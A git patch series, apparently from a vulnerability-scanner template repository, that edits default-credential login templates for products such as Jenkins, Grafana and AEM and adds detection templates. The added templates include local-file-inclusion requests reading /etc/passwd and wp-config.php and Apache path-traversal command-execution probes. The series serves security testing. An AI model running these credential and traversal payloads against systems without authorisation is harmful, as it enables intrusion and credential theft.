default-logins/solarwinds/solarwinds-default-login.yaml | 4 ++-- default-logins/szhe/szhe-default-login.yaml | 2 +- default-logins/visionhub/visionhub-default-login.yaml | 2 +- 24 files changed, 29 insertions(+), 27 deletions(-) diff --git a/default-logins/UCMDB/ucmdb-default-login.yaml b/default-logins/UCMDB/ucmdb-default-login.yaml index 7118ae3120..6c3863b68b 100644 --- a/default-logins/UCMDB/ucmdb-default-login.yaml +++ b/default-logins/UCMDB/ucmdb-default-login.yaml @@ -10,7 +10,7 @@ requests: - raw: - | POST /ucmdb-ui/cms/loginRequest.do; HTTP/1.1 - Host: {{BaseURL}} + Host: {{Hostname}} customerID=1&isEncoded=false&userName=diagnostics&password={{base64(password)}}&ldapServerName=UCMDB diff --git a/default-logins/abb/cs141-default-login.yaml b/default-logins/abb/cs141-default-login.yaml index c06e4dc047..9eeca9b32b 100644 --- a/default-logins/abb/cs141-default-login.yaml +++ b/default-logins/abb/cs141-default-login.yaml @@ -19,6 +19,7 @@ requests: "userName":{{username}},"password":{{password}} + attack: pitchfork payloads: username: - admin @@ -28,7 +29,8 @@ requests: - cs141-snmp - engineer - guest - attack: pitchfork + + stop-at-first-match: true matchers-condition: and matchers: - type: word diff --git a/default-logins/alibaba/canal-default-login.yaml b/default-logins/alibaba/canal-default-login.yaml index b61dd7ec9c..864c53b7cc 100644 --- a/default-logins/alibaba/canal-default-login.yaml +++ b/default-logins/alibaba/canal-default-login.yaml @@ -10,7 +10,7 @@ requests: - raw: - | POST /api/v1/user/login HTTP/1.1 - Host: {{BaseURL}} + Host: {{Hostname}} Content-Type: application/json "username":{{username}},"password":{{password}} diff --git a/default-logins/ambari/ambari-default-login.yaml b/default-logins/ambari/ambari-default-login.yaml index 6d8ceb4eee..6bb9c6de1a 100644 --- a/default-logins/ambari/ambari-default-login.yaml +++ b/default-logins/ambari/ambari-default-login.yaml @@ -10,7 +10,7 @@ requests: - raw: - | GET /api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name HTTP/1.1 - Host: {{BaseURL}} + Host: {{Hostname}} Authorization: Basic {{base64(username + ':' + password)}} payloads: username: diff --git a/default-logins/arl/arl-default-login.yaml b/default-logins/arl/arl-default-login.yaml index c0c34ba105..6b9c067105 100644 --- a/default-logins/arl/arl-default-login.yaml +++ b/default-logins/arl/arl-default-login.yaml @@ -10,7 +10,7 @@ requests: - raw: - | POST /api/user/login HTTP/1.1 - Host: {{BaseURL}} + Host: {{Hostname}} Content-Type: application/json; charset=UTF-8 "username":{{username}},"password":{{password}} diff --git a/default-logins/axis2/axis2-default-login.yaml b/default-logins/axis2/axis2-default-login.yaml index f66b2bdb67..db69d4767f 100644 --- a/default-logins/axis2/axis2-default-login.yaml +++ b/default-logins/axis2/axis2-default-login.yaml @@ -10,14 +10,14 @@ requests: - raw: - | POST /axis2-admin/login HTTP/1.1 - Host: {{BaseURL}} + Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded loginUsername={{username}}&loginPassword={{password}} - | POST /axis2/axis2-admin/login HTTP/1.1 - Host: {{BaseURL}} + Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded userName={{username}}&password={{password}}&submit=+Login+ diff --git a/default-logins/chinaunicom/chinaunicom-default-login.yaml b/default-logins/chinaunicom/chinaunicom-default-login.yaml index 7c0f7e6c06..7bda4c8bc4 100644 --- a/default-logins/chinaunicom/chinaunicom-default-login.yaml +++ b/default-logins/chinaunicom/chinaunicom-default-login.yaml @@ -10,7 +10,7 @@ requests: - raw: - | POST /cu.html HTTP/1.1 - Host: {{BaseURL}} + Host: {{Hostname}} "frashnum=&action=login&Frm_Logintoken=1&Username={{username}}&Password={{password}}&Username=&Password=" diff --git a/default-logins/dell/dell-idrac-default-login.yaml b/default-logins/dell/dell-idrac-default-login.yaml index f531c8a4af..6e06c1ace2 100644 --- a/default-logins/dell/dell-idrac-default-login.yaml +++ b/default-logins/dell/dell-idrac-default-login.yaml @@ -9,7 +9,7 @@ requests: - raw: - | POST /data/login HTTP/1.1 - Host: {{BaseURL}} + Host: {{Hostname}} user={{username}}&password={{password}} diff --git a/default-logins/dell/emcecom-default-login.yaml b/default-logins/dell/emcecom-default-login.yaml index 9cd443f6f9..c7d78156d9 100644 --- a/default-logins/dell/emcecom-default-login.yaml +++ b/default-logins/dell/emcecom-default-login.yaml @@ -12,7 +12,7 @@ requests: - raw: - | GET / HTTP/1.1 - Host: {{BaseURL}} + Host: {{Hostname}} Authorization: Basic {{base64(username + ':' + password)}} payloads: diff --git a/default-logins/druid/druid-default-login.yaml b/default-logins/druid/druid-default-login.yaml index 44771c5683..78d252b867 100644 --- a/default-logins/druid/druid-default-login.yaml +++ b/default-logins/druid/druid-default-login.yaml @@ -10,13 +10,13 @@ requests: - raw: - | POST /druid/submitLogin HTTP/1.1 - Host: {{BaseURL}} + Host: {{Hostname}} loginUsername={{username}}&loginPassword={{password}} - | POST /submitLogin HTTP/1.1 - Host: {{BaseURL}} + Host: {{Hostname}} loginUsername={{username}}&loginPassword={{password}} diff --git a/default-logins/frps/frp-default-login.yaml b/default-logins/frps/frp-default-login.yaml index c05cc9d9c2..2dc240d633 100644 --- a/default-logins/frps/frp-default-login.yaml +++ b/default-logins/frps/frp-default-login.yaml @@ -11,7 +11,7 @@ requests: - raw: - | GET /api/proxy/tcp HTTP/1.1 - Host: {{BaseURL}} + Host: {{Hostname}} Authorization: Basic {{base64(username + ':' + password)}} payloads: diff --git a/default-logins/hortonworks/smartsense-default-login.yaml b/default-logins/hortonworks/smartsense-default-login.yaml index 419f8daafc..0bddf7fce8 100644 --- a/default-logins/hortonworks/smartsense-default-login.yaml +++ b/default-logins/hortonworks/smartsense-default-login.yaml @@ -12,7 +12,7 @@ requests: - raw: - | GET /apt/v1/context HTTP/1.1 - Host: {{BaseURL}} + Host: {{Hostname}} Authorization: Basic {{base64(username + ':' + password)}} payloads: diff --git a/default-logins/idemia/idemia-biometrics-default-login.yaml b/default-logins/idemia/idemia-biometrics-default-login.yaml index c7c18531bf..9c7aa9d12a 100644 --- a/default-logins/idemia/idemia-biometrics-default-login.yaml +++ b/default-logins/idemia/idemia-biometrics-default-login.yaml @@ -12,7 +12,7 @@ requests: - raw: - | POST /cgi-bin/login.cgi HTTP/1.1 - Host: {{BaseURL}} + Host: {{Hostname}} password={{password}} diff --git a/default-logins/minio/minio-default-login.yaml b/default-logins/minio/minio-default-login.yaml index 688c5ec225..d9338fbaf2 100644 --- a/default-logins/minio/minio-default-login.yaml +++ b/default-logins/minio/minio-default-login.yaml @@ -10,7 +10,7 @@ requests: - raw: - | POST /minio/webrpc HTTP/1.1 - Host: {{BaseURL}} + Host: {{Hostname}} Content-Type: application/json {"id":1,"jsonrpc":"2.0","params":{"username":"{{username}}","password":"{{password}}"},"method":"Web.Login"} diff --git a/default-logins/nagios/nagios-default-login.yaml b/default-logins/nagios/nagios-default-login.yaml index 6547c8ddc2..8fb3713825 100644 --- a/default-logins/nagios/nagios-default-login.yaml +++ b/default-logins/nagios/nagios-default-login.yaml @@ -9,7 +9,7 @@ requests: - raw: - | GET /nagios/side.php HTTP/1.1 - Host: {{BaseURL}} + Host: {{Hostname}} Authorization: Basic {{base64(username + ':' + password)}} payloads: diff --git a/default-logins/nps/nps-default-login.yaml b/default-logins/nps/nps-default-login.yaml index c1fdfc115f..5768136961 100644 --- a/default-logins/nps/nps-default-login.yaml +++ b/default-logins/nps/nps-default-login.yaml @@ -10,7 +10,7 @@ requests: - raw: - | POST /login/verify HTTP/1.1 - Host: {{BaseURL}} + Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Referer: {{Hostname}}/login/index diff --git a/default-logins/ofbiz/ofbiz-default-login.yaml b/default-logins/ofbiz/ofbiz-default-login.yaml index a56be731de..4471e1295a 100644 --- a/default-logins/ofbiz/ofbiz-default-login.yaml +++ b/default-logins/ofbiz/ofbiz-default-login.yaml @@ -10,7 +10,7 @@ requests: - raw: - | POST /control/login HTTP/1.1 - Host: {{BaseURL}} + Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded USERNAME={{username}}&PASSWORD={{password}}&FTOKEN=&JavaScriptEnabled=Y diff --git a/default-logins/paloalto/panos-default-login.yaml b/default-logins/paloalto/panos-default-login.yaml index b71ddef7d3..f7bac9f620 100644 --- a/default-logins/paloalto/panos-default-login.yaml +++ b/default-logins/paloalto/panos-default-login.yaml @@ -12,7 +12,7 @@ requests: - raw: - | POST /php/login.php HTTP/1.1 - Host: {{BaseURL}} + Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded user={{username}}&passwd={{password}}&challengePwd=&ok=Login diff --git a/default-logins/rabbitmq/rabbitmq-default-login.yaml b/default-logins/rabbitmq/rabbitmq-default-login.yaml index cce9613915..4497061308 100644 --- a/default-logins/rabbitmq/rabbitmq-default-login.yaml +++ b/default-logins/rabbitmq/rabbitmq-default-login.yaml @@ -10,7 +10,7 @@ requests: - raw: - | GET /api/whoami HTTP/1.1 - Host: {{BaseURL}} + Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Authorization: Basic {{base64(username + ':' + password)}} diff --git a/default-logins/samsung/samsung-wlan-default-login.yaml b/default-logins/samsung/samsung-wlan-default-login.yaml index 532af39f49..61f4e09b12 100644 --- a/default-logins/samsung/samsung-wlan-default-login.yaml +++ b/default-logins/samsung/samsung-wlan-default-login.yaml @@ -11,7 +11,7 @@ requests: - raw: - | POST /main.ehp HTTP/1.1 - Host: {{BaseURL}} + Host: {{Hostname}} "httpd;General;lang=en&login_id={{username}}&login_pw={{password}}" diff --git a/default-logins/showdoc/showdoc-default-login.yaml b/default-logins/showdoc/showdoc-default-login.yaml index b4910e3e9b..056d562bcb 100644 --- a/default-logins/showdoc/showdoc-default-login.yaml +++ b/default-logins/showdoc/showdoc-default-login.yaml @@ -12,7 +12,7 @@ requests: - raw: - | POST /server/index.php?s=/api/user/login HTTP/1.1 - Host: {{BaseURL}} + Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded;charset=UTF-8 username={{username}}&password={{password}}&v_code= diff --git a/default-logins/solarwinds/solarwinds-default-login.yaml b/default-logins/solarwinds/solarwinds-default-login.yaml index 6e8133a122..421104562e 100644 --- a/default-logins/solarwinds/solarwinds-default-login.yaml +++ b/default-logins/solarwinds/solarwinds-default-login.yaml @@ -15,12 +15,12 @@ requests: - raw: - | GET /SolarWinds/InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS HTTP/1.1 - Host: {{BaseURL}} + Host: {{Hostname}} Authorization: Basic {{base64(username)}} - | GET /InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS HTTP/1.1 - Host: {{BaseURL}} + Host: {{Hostname}} Authorization: Basic {{base64(username)}} payloads: diff --git a/default-logins/szhe/szhe-default-login.yaml b/default-logins/szhe/szhe-default-login.yaml index 6c25fb3458..cb6a6fe9b0 100644 --- a/default-logins/szhe/szhe-default-login.yaml +++ b/default-logins/szhe/szhe-default-login.yaml @@ -12,7 +12,7 @@ requests: - raw: - | POST /login/ HTTP/1.1 - Host: {{BaseURL}} + Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded email={{username}}&password={{password}}&remeber=true diff --git a/default-logins/visionhub/visionhub-default-login.yaml b/default-logins/visionhub/visionhub-default-login.yaml index cd46c4dd62..df2983be93 100644 --- a/default-logins/visionhub/visionhub-default-login.yaml +++ b/default-logins/visionhub/visionhub-default-login.yaml @@ -12,7 +12,7 @@ requests: - raw: - | POST /VisionHubWebApi/api/Login HTTP/1.1 - Host: {{BaseURL}} + Host: {{Hostname}} Authorization: Basic {{base64(username + ':' + password)}} payloads: From 6ad463dfb299f6753cc95d03f79341471de5bd39 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 10 Oct 2021 06:53:42 +0530 Subject: [PATCH 2816/4083] misc fix --- default-logins/grafana/grafana-default-login.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/default-logins/grafana/grafana-default-login.yaml b/default-logins/grafana/grafana-default-login.yaml index 81feed8c51..30f759b9cb 100644 --- a/default-logins/grafana/grafana-default-login.yaml +++ b/default-logins/grafana/grafana-default-login.yaml @@ -21,16 +21,16 @@ requests: {"user":"{{username}}","password":"{{password}}"} - + attack: pitchfork payloads: username: - admin + - admin + password: - prom-operator - admin - attack: sniper - matchers-condition: and matchers: - type: word From 4a303b89e839d77730711cd7c56313cbb7066382 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 10 Oct 2021 06:59:57 +0530 Subject: [PATCH 2817/4083] more fixes --- default-logins/glpi/glpi-default-login.yaml | 20 ++++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) diff --git a/default-logins/glpi/glpi-default-login.yaml b/default-logins/glpi/glpi-default-login.yaml index 9a3f2b190d..c2ea4c26d7 100644 --- a/default-logins/glpi/glpi-default-login.yaml +++ b/default-logins/glpi/glpi-default-login.yaml @@ -1,4 +1,5 @@ id: glpi-default-login + info: name: GLPI Default Login author: andysvints @@ -20,17 +21,14 @@ requests: Content-Type: application/x-www-form-urlencoded Referer: {{BaseURL}} - {{name}}={{username}}&{{passwords}}={{password}}&auth=local&submit=Submit&_glpi_csrf_token={{token}} + {{name}}={{user}}&{{password}}={{pass}}&auth=local&submit=Submit&_glpi_csrf_token={{token}} - payloads: - username: - - glpi - password: - - glpi attack: pitchfork - - cookie-reuse: true - redirects: true + payloads: + user: + - glpi + pass: + - glpi extractors: - type: regex @@ -50,18 +48,20 @@ requests: - "type=\"text\" name=\"([0-9a-z]+)\" id=\"login_name\" required=\"required\"" - type: regex - name: passwords + name: password part: body internal: true group: 1 regex: - "type=\"password\" name=\"([0-9a-z]+)\" id=\"login_password\" required=\"required\"" + cookie-reuse: true matchers-condition: and matchers: - type: word words: - 'GLPI - Standard Interface' + - type: status status: - 200 From 34543ded24a35d987684a514d6e9180cf83418a8 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 10 Oct 2021 07:02:57 +0530 Subject: [PATCH 2818/4083] more updates --- default-logins/jenkins/jenkins-default.yaml | 16 ++++------------ 1 file changed, 4 insertions(+), 12 deletions(-) diff --git a/default-logins/jenkins/jenkins-default.yaml b/default-logins/jenkins/jenkins-default.yaml index 72f188bd35..2f2d3c8ef9 100644 --- a/default-logins/jenkins/jenkins-default.yaml +++ b/default-logins/jenkins/jenkins-default.yaml @@ -20,19 +20,12 @@ requests: j_username={{username}}&j_password={{password}}&from=%2F&Submit=Sign+in - - | - POST /j_spring_security_check HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - Cookie: {{cookie}} - - j_username={{username}}&j_password={{password}}&from=%2F&Submit=Sign+in - - | GET / HTTP/1.1 Host: {{Hostname}} Cookie: {{cookie}} + attack: pitchfork payloads: username: - admin @@ -40,7 +33,6 @@ requests: password: - admin - password - attack: pitchfork extractors: - type: regex @@ -53,7 +45,7 @@ requests: req-condition: true matchers: - type: dsl + condition: and dsl: - - 'contains(body_4, "/logout")' - - 'contains(body_4, "Dashboard [Jenkins]")' - condition: and \ No newline at end of file + - 'contains(body_3, "/logout")' + - 'contains(body_3, "Dashboard [Jenkins]")' From 6811004e685011ca995580365e41d2065a442000 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 10 Oct 2021 07:06:14 +0530 Subject: [PATCH 2819/4083] misc updates --- default-logins/aem/aem-default-login.yaml | 13 ++++++------- 1 file changed, 6 insertions(+), 7 deletions(-) diff --git a/default-logins/aem/aem-default-login.yaml b/default-logins/aem/aem-default-login.yaml index 71121fe48f..4a3fe43989 100644 --- a/default-logins/aem/aem-default-login.yaml +++ b/default-logins/aem/aem-default-login.yaml @@ -4,7 +4,7 @@ info: name: Adobe AEM Default Login author: random-robbie severity: critical - tags: aem,default-login,fuzz + tags: aem,default-login requests: - raw: @@ -15,23 +15,22 @@ requests: Origin: {{BaseURL}} Referer: {{BaseURL}}/libs/granite/core/content/login.html - _charset_=utf-8&j_username={{rr_username}}&j_password={{rr_password}}&j_validate=true + _charset_=utf-8&j_username={{aem_user}}&j_password={{aem_pass}}&j_validate=true + attack: pitchfork payloads: - - rr_username: + aem_user: - admin - grios - replication-receiver - vgnadmin - rr_password: + aem_pass: - admin - password - replication-receiver - vgnadmin - attack: pitchfork # Available options: sniper, pitchfork and clusterbomb stop-at-first-match: true matchers-condition: and matchers: @@ -41,7 +40,7 @@ requests: - type: word part: header + condition: and words: - login-token - crx.default - condition: and From 685444f3fbfdbb3917d111a79e03bd9bcad41fbd Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 10 Oct 2021 07:10:47 +0530 Subject: [PATCH 2820/4083] misc update --- default-logins/apache/superset-default-login.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/default-logins/apache/superset-default-login.yaml b/default-logins/apache/superset-default-login.yaml index 36bf8da2ea..aca3520299 100644 --- a/default-logins/apache/superset-default-login.yaml +++ b/default-logins/apache/superset-default-login.yaml @@ -21,18 +21,18 @@ requests: Content-Type: application/x-www-form-urlencoded Referer: {{BaseURL}}/admin/airflow/login - csrf_token={{csrff_token}}&username={{username}}&password={{password}} + csrf_token={{csrf_token}}&username={{username}}&password={{password}} + attack: pitchfork payloads: username: - admin password: - admin - attack: pitchfork extractors: - type: regex - name: csrff_token + name: csrf_token group: 1 part: body internal: true From 0ef49105ecf8947ed2a5c54f5d73db902be0bc98 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 10 Oct 2021 07:14:12 +0530 Subject: [PATCH 2821/4083] misc update --- default-logins/chinaunicom/chinaunicom-default-login.yaml | 5 +++-- default-logins/samsung/samsung-wlan-default-login.yaml | 5 +++-- 2 files changed, 6 insertions(+), 4 deletions(-) diff --git a/default-logins/chinaunicom/chinaunicom-default-login.yaml b/default-logins/chinaunicom/chinaunicom-default-login.yaml index 7bda4c8bc4..9b69089ffb 100644 --- a/default-logins/chinaunicom/chinaunicom-default-login.yaml +++ b/default-logins/chinaunicom/chinaunicom-default-login.yaml @@ -12,20 +12,21 @@ requests: POST /cu.html HTTP/1.1 Host: {{Hostname}} - "frashnum=&action=login&Frm_Logintoken=1&Username={{username}}&Password={{password}}&Username=&Password=" + frashnum=&action=login&Frm_Logintoken=1&Username={{username}}&Password={{password}}&Username=&Password= + attack: pitchfork payloads: username: - CUAdmin password: - CUAdmin - attack: pitchfork matchers-condition: and matchers: - type: status status: - 302 + - type: word words: - "/menu.gch" diff --git a/default-logins/samsung/samsung-wlan-default-login.yaml b/default-logins/samsung/samsung-wlan-default-login.yaml index 61f4e09b12..9b2e264515 100644 --- a/default-logins/samsung/samsung-wlan-default-login.yaml +++ b/default-logins/samsung/samsung-wlan-default-login.yaml @@ -13,7 +13,7 @@ requests: POST /main.ehp HTTP/1.1 Host: {{Hostname}} - "httpd;General;lang=en&login_id={{username}}&login_pw={{password}}" + httpd;General;lang=en&login_id={{username}}&login_pw={{password}} payloads: username: @@ -25,10 +25,11 @@ requests: matchers-condition: and matchers: - type: word + part: body words: - "document.formParent2.changepasswd1.value" - "passwd_change.ehp" - part: body + - type: status status: - 200 From 3a5ff18113cbdfedf051fad618f37aa4f418cee2 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 10 Oct 2021 07:17:04 +0530 Subject: [PATCH 2822/4083] Update arl-default-login.yaml --- default-logins/arl/arl-default-login.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/default-logins/arl/arl-default-login.yaml b/default-logins/arl/arl-default-login.yaml index 6b9c067105..6c658cb215 100644 --- a/default-logins/arl/arl-default-login.yaml +++ b/default-logins/arl/arl-default-login.yaml @@ -13,7 +13,7 @@ requests: Host: {{Hostname}} Content-Type: application/json; charset=UTF-8 - "username":{{username}},"password":{{password}} + {"username":{{username}},"password":{{password}}} payloads: username: @@ -26,11 +26,12 @@ requests: matchers: - type: word + condition: and words: - '"message": "success"' - '"username": "admin"' - '"type": "login"' - condition: and + - type: status status: - 200 From 2b0f8e18a7a7b98dddf5635e7e4c91c1d8c7198f Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 10 Oct 2021 07:18:39 +0530 Subject: [PATCH 2823/4083] Update arl-default-login.yaml --- default-logins/arl/arl-default-login.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/default-logins/arl/arl-default-login.yaml b/default-logins/arl/arl-default-login.yaml index 6c658cb215..a7c16e40a9 100644 --- a/default-logins/arl/arl-default-login.yaml +++ b/default-logins/arl/arl-default-login.yaml @@ -13,7 +13,7 @@ requests: Host: {{Hostname}} Content-Type: application/json; charset=UTF-8 - {"username":{{username}},"password":{{password}}} + {"username":"{{username}}","password":"{{password}}"} payloads: username: From 03e6dac823816b8179d44bff46cf5145ffe3fd5a Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 10 Oct 2021 07:23:02 +0530 Subject: [PATCH 2824/4083] more fixes --- default-logins/abb/cs141-default-login.yaml | 6 +++--- default-logins/alibaba/canal-default-login.yaml | 15 ++++++++------- 2 files changed, 11 insertions(+), 10 deletions(-) diff --git a/default-logins/abb/cs141-default-login.yaml b/default-logins/abb/cs141-default-login.yaml index 9eeca9b32b..af761abc88 100644 --- a/default-logins/abb/cs141-default-login.yaml +++ b/default-logins/abb/cs141-default-login.yaml @@ -17,15 +17,15 @@ requests: Accept: application/json, text/plain, */* Content-Type: application/json - "userName":{{username}},"password":{{password}} + {"userName":"{{user}}","password":"{{pass}}"} attack: pitchfork payloads: - username: + user: - admin - engineer - guest - password: + pass: - cs141-snmp - engineer - guest diff --git a/default-logins/alibaba/canal-default-login.yaml b/default-logins/alibaba/canal-default-login.yaml index 864c53b7cc..a4c4a1b801 100644 --- a/default-logins/alibaba/canal-default-login.yaml +++ b/default-logins/alibaba/canal-default-login.yaml @@ -13,22 +13,23 @@ requests: Host: {{Hostname}} Content-Type: application/json - "username":{{username}},"password":{{password}} + {"username":"{{user}}","password":"{{pass}}"} - payloads: - username: - - admin - password: - - 123456 attack: pitchfork + payloads: + user: + - admin + pass: + - 123456 matchers-condition: and matchers: - type: status status: - 200 + - type: word + condition: and words: - 'data":{"token"' - '"code":20000' - condition: and From 3291ec2fe90d7c4e1b9c03fda51f336a91f40ea4 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Sun, 10 Oct 2021 21:19:56 +0900 Subject: [PATCH 2825/4083] Create lotus-core-cms-lfi.yaml --- lotus-core-cms-lfi.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 lotus-core-cms-lfi.yaml diff --git a/lotus-core-cms-lfi.yaml b/lotus-core-cms-lfi.yaml new file mode 100644 index 0000000000..a95e75c0f9 --- /dev/null +++ b/lotus-core-cms-lfi.yaml @@ -0,0 +1,24 @@ +id: lotus-core-cms-lfi + +info: + name: Lotus Core CMS 1.0.1 - Local File Inclusion + author: 0x_Akoko + severity: high + tags: lfi + reference: https://cxsecurity.com/issue/WLB-2020010234 + +requests: + - method: GET + path: + - '{{BaseURL}}/index.php?page_slug=../../../../../etc/passwd%00' + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 From 93fe5a07840193e20222715a009e79e3bd69e538 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Sun, 10 Oct 2021 21:22:32 +0900 Subject: [PATCH 2826/4083] Create advanced-access-manager-plugin-lfi.yaml --- advanced-access-manager-plugin-lfi.yaml | 26 +++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 advanced-access-manager-plugin-lfi.yaml diff --git a/advanced-access-manager-plugin-lfi.yaml b/advanced-access-manager-plugin-lfi.yaml new file mode 100644 index 0000000000..b93c4467e6 --- /dev/null +++ b/advanced-access-manager-plugin-lfi.yaml @@ -0,0 +1,26 @@ +id: advanced-access-manager-plugin-lfi + +info: + name: Advanced Access Manager < 5.9.9 - Unauthenticated Local File Inclusion + author: 0x_Akoko + severity: high + tags: wordpress,wp-plugin,lfi,wp + reference: https://wpscan.com/vulnerability/9873 + +requests: + - method: GET + path: + - '{{BaseURL}}/?aam-media=wp-config.php ' + + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + part: body + condition: and + + - type: status + status: + - 200 From 665e3f15e581d7656f0b9b39955a9ff2c7166d4d Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 10 Oct 2021 18:27:15 +0530 Subject: [PATCH 2827/4083] dynamic match --- cves/2021/CVE-2021-41773.yaml | 2 +- cves/2021/CVE-2021-42013.yaml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-41773.yaml b/cves/2021/CVE-2021-41773.yaml index c1340fcb3d..e82bbd6bef 100644 --- a/cves/2021/CVE-2021-41773.yaml +++ b/cves/2021/CVE-2021-41773.yaml @@ -24,7 +24,7 @@ requests: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - echo Content-Type: text/plain; echo; echo CVE-2021-41773 + echo Content-Type: text/plain; echo; echo 37714-1202-EVC | rev matchers-condition: or matchers: diff --git a/cves/2021/CVE-2021-42013.yaml b/cves/2021/CVE-2021-42013.yaml index 0978186622..9537c2fa6b 100644 --- a/cves/2021/CVE-2021-42013.yaml +++ b/cves/2021/CVE-2021-42013.yaml @@ -24,7 +24,7 @@ requests: Origin: {{BaseURL}} Content-Type: application/x-www-form-urlencoded - echo Content-Type: text/plain; echo; echo CVE-2021-42013 + echo Content-Type: text/plain; echo; echo 31024-1202-EVC | rev unsafe: true matchers-condition: or From 59a6cef7fbab16315e1dae837fb7475c634648a7 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Sun, 10 Oct 2021 16:07:15 +0300 Subject: [PATCH 2828/4083] Missing 'a' --- cves/2018/CVE-2018-12998.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2018/CVE-2018-12998.yaml b/cves/2018/CVE-2018-12998.yaml index 276fbcff83..cd23caa054 100644 --- a/cves/2018/CVE-2018-12998.yaml +++ b/cves/2018/CVE-2018-12998.yaml @@ -4,7 +4,7 @@ info: name: Zoho manageengine Arbitrary Reflected XSS author: pikpikcu severity: medium - description: reflected Cross-site scripting (XSS) vulnerability in Zoho ManageEngine Netflow Analyzer before build 123137, Network Configuration Manager before build 123128, OpManager before build 123148, OpUtils before build 123161, and Firewall Analyzer before build 123147 allows remote attackers to inject arbitrary web script or HTML via the parameter 'operation' to /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet. + description: A reflected Cross-site scripting (XSS) vulnerability in Zoho ManageEngine Netflow Analyzer before build 123137, Network Configuration Manager before build 123128, OpManager before build 123148, OpUtils before build 123161, and Firewall Analyzer before build 123147 allows remote attackers to inject arbitrary web script or HTML via the parameter 'operation' to /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet. reference: - https://github.com/unh3x/just4cve/issues/10 - http://packetstormsecurity.com/files/148635/Zoho-ManageEngine-13-13790-build-XSS-File-Read-File-Deletion.html From 0f0cb7c0e18c2e0c62ba3c7b6067acbedc3938ca Mon Sep 17 00:00:00 2001 From: Divya Date: Sun, 10 Oct 2021 12:42:25 -0400 Subject: [PATCH 2829/4083] Add lansweeper-login.yaml Detect Lansweeper login page --- exposed-panels/lansweeper-login.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 exposed-panels/lansweeper-login.yaml diff --git a/exposed-panels/lansweeper-login.yaml b/exposed-panels/lansweeper-login.yaml new file mode 100644 index 0000000000..1fc63607fa --- /dev/null +++ b/exposed-panels/lansweeper-login.yaml @@ -0,0 +1,23 @@ +id: lansweeper-login + +info: + name: Lansweeper Login + author: divya_mudgal + severity: info + tags: lansweeper,tech,panel + +requests: + - method: GET + path: + - "{{BaseURL}}/login.aspx" + + matchers: + - type: regex + regex: + - [\s\S]*?Lansweeper - Login[\s\S]*?<\/title> + condition: or + + - type: dsl + name: lansweeper + dsl: + - "len(body)==15086 && status_code==200 && (\"0A60C945E674EC7B953429B515519567\" == md5(body))" \ No newline at end of file From 3e3e64c20eac372404b69b086dc19002f8cb3908 Mon Sep 17 00:00:00 2001 From: Divya <divya.mudgal92+github@gmail.com> Date: Sun, 10 Oct 2021 13:03:46 -0400 Subject: [PATCH 2830/4083] Add unauthenticated-lansweeper.yaml Detect unauthenticated Lansweeper instance --- .../unauthenticated-lansweeper.yaml | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) create mode 100644 misconfiguration/unauthenticated-lansweeper.yaml diff --git a/misconfiguration/unauthenticated-lansweeper.yaml b/misconfiguration/unauthenticated-lansweeper.yaml new file mode 100644 index 0000000000..2f1f393bfb --- /dev/null +++ b/misconfiguration/unauthenticated-lansweeper.yaml @@ -0,0 +1,17 @@ +id: unauthenticated-lansweeper + +info: + name: Unauthenticated Lansweeper Instance + author: divya_mudgal + severity: high + tags: lansweeper,unauth + +requests: + - method: GET + path: + - "{{BaseURL}}/Default.aspx" + + matchers: + - type: regex + regex: + - <title>[\s\S]*?Main page - Lansweeper[\s\S]*?<\/title> \ No newline at end of file From 16ea26b2959de3c1103c2e6ae2073919605e663e Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Mon, 11 Oct 2021 01:16:37 +0530 Subject: [PATCH 2831/4083] Added Fastjson 1.2.24 Deserialization RCE --- .../fastjson/fastjson-1224-rce.yaml | 39 